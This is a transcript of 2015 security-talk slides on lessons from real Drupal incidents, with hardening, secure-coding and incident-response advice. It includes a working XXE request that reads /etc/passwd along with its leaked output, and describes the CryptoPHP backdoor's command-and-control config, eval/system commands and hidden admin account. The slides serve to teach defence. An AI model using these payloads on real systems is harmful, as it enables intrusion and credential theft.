drupal, lessons learnt from real world security incidents
TRANSCRIPT
Drupal, Lessons learnt from real world
security incidentsDr. Pedram Hayati
Principal IT Security Consultant
SecDim
21 May 2015
Drupal Security
• Looking from an attacker angle
• Targeting the software• Publically known weaknesses or 0days
• Drupal core or modules
• Targeting a user• Social engineering
• Targeting a developer• Watering hole attacks
What a security tester should know!
• Security is not a high priority• Sad but true• If a software is not usable, it doesn’t matter it is secure or not.• Security tester is not the only stakeholder
• Learn the terminology• Defect and bug instead of 0day and vulnerability• Enhancement instead of best practice recommendation
• Explain “how to fix” not “how to break”• Security tester excited to show how to hack the planet• Dev care about how to effectively fix things• One size doesn’t fit all.• Spend a lot on issue detail but less on remediation plan.
• Show some respect!• Bashing developers and being negative toward them.
Targeting software
Pre-Auth SQL Injection in Drupal Core
• 15 October 2014• A major SQL injection vulnerability with in Drupal Core
• CVE-2014-3704
• Likelihood: Pre-auth
• Impact: privilege escalation, code execution
• You are likely compromised if you haven’t patched your Drupal within 7 hours of this issue being announced.
• https://www.drupal.org/node/2357241
Hardening - Generic
• Remember, Drupal has a higher risk profile. • Subscribe to security feeds
• Have backups and make sure they work
• Be ready and prepare your (basic) incident response strategy
• References• Drupal security feed: https://www.drupal.org/security/psa
• Security team contact: https://security.drupal.org/team-members
• Incident response plan: http://www.comptechdoc.org/independent/security/policies/incident-response-plan.html
• https://twitter.com/drupalsecurity
Hardening – Secure coding
• Myth #1: Defend as close as possible to destination• Use parametrized queries
• Use db_query() and db_rewrite_sql() and never concatenate the data• Use Drupal’s check functions for output filtering
• Use check_plain(), check_markup(), check_url and filter_xss() • There is no JavaScript validation
• Myth #2: It is not just input and output handleing• Understand Cross-Site Request Forgery (XSRF)• Use Form API
• Myth #3: File upload is difficult to secure• Avoid file upload where possible• Re-produce the file (e.g. GD library)• Check Mime, magic numbers, byte codes.
Hardening – Secure coding
• Myth #4: Remember hash algorithm is ever evolving• Md5 = plaintext. Sha1 ~= plaintext
• Use a slow hashing algorithm• Scrypt -> bcrypt (15 rounds)-> PBKDF2 with SHA256
• Salt the hash
• Use Hash-based Message Authentication Code (HMAC)
• drupal_hmac uses sha256 that is not recommended.
Pre-Auth XXE
• 24 March 2015• XML External Entity (XXE)
• XML document has a reference to user controllable field that include an external entity
• A weakness within Service module
• Allow arbitrary file read (e.g. settings.php)
• By Renaud Dubourguais from Synactive on 24 March 2015
• http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf
Pre-Auth XXE: Sample payload
POST /drupal7.28/?q=test/node HTTP/1.1
[...]
<!DOCTYPE root [
<!ENTITY % evil SYSTEM "file:///etc/passwd">
%evil;
]>
<xml>
<test>test</test>
</xml>
Pre-Auth XXE: Response
<?xml version="1.0" encoding="utf8"?>
<result>Line 5, Col 9: failed to load external entity
&quot;file://W00Tcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi
91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzO
ng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMK
Z2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9
jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG
9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhc
i9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNy
L3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDo
zMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci
9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCg==W00T&quot;
Line 9, Col 27: Opening and ending tag mismatch: test line 9 and type
</result>
Pre-Auth XXE: Reponse
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
wwwdata:x:33:33:wwwdata:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
How to fix it?
• Input validation?
• Output validation or rendering?
• Business logic• Access control
Targeting user
CryptoPHP
• 20 November 2014 by Fox it• Large number of backdoored CMS including Drupal, Joomla and Wordpress
• Use for Blackhat SEO
• Spread through• Pirated themes
• Commercial plugins for free
• Nulled scripts
CryptoPHP
• C2 communication
• {"servers": ["127.0.0.1", "127.0.0.2"],
"eval": ["print(system('ls -la'));", "phpinfo();"],
"echo": ["strings to be echoed", "etc."],
}
• Mail communication• For failover
• Manual control• http://127.0.0.1/index.php?<serverkey>=reset
• Encrypted communication
• Adds a new admin account for future access• Username: system[0-9]*• Password: FUHIAsbdiugAS
Remediation
• Look inside your theme (and modules) directory for:
<?php include('images/social.png'); ?>
• Check the authenticity of your packages• Use legitimate sources
• Check the integrity of the downloaded packages• Checksum
• More info: https://foxitsecurity.files.wordpress.com/2014/11/cryptophp-whitepaper-foxsrt-v4.pdf
Targeting developer
Watering Hole Attack
• An attack strategy targeted toward user groups• Developers, operations, normal users
• Commonly a website that is used by the victim group is infected. The victim group will be eventually infected through infected website.
• November 2014• Forbes.com compromised
• 0day for IE and Flash
• Target• US defence
• Financial services
Awareness
• Developers• Typically have high privileged access on the local machine or network services• Increase security of your browser
• Addon: NoScripts• Addon: Web of Trust (WOT)• Use different profile or browser for surfing web and doing work• Have a read about capabilities of BeEF framework
• http://beefproject.com/
• Increase security of your email client• Increase security settings of Outlook
• Default all emails to plain text• Keep personal and work email in a separate email clients
• Even on your smart phone
• Use trusted sources• Verify the integrity of downloaded files
Unhack my website
1. Make a (forensic) copy of your entire server1. Do not change anything2. Get an snapshot of your Cloud/VM instance
2. Take your website offline
3. Notify users and stakeholders.
4. Start the investigation progress1. It is likely automated. Search for known signatures2. Check integrity of all files
1. Drupal Hacked module: https://www.drupal.org/project/hacked
3. Use available tools1. Sort files and other data base on time2. Create a timeline
4. Call for help
5. Rebuild your website1. Restore an older snapshot 2. Apply all patches.
Bonus
• An actual attack can come days later• There are different threat actors are behind attacks: https://blog.secdim.com/in-
depth-analysis-of-ssh-attacks-on-amazon-ec2/• Go back in time
• Malware names are randomised • Look into outbound network connections• tcpdump
• Malware are renamed to a legitimate executables• Your best friends
• lsof• strace• nestat
Wrap up
• My point was to provide you with awareness
• Attackers find easiest and most effective way to target• Software
• Users
• Developers
• Keep up-to-date with Drupal security feed
• Get yourself engaged in local security communities.
Thank You@pi3ch |blog.secdim.com | [email protected]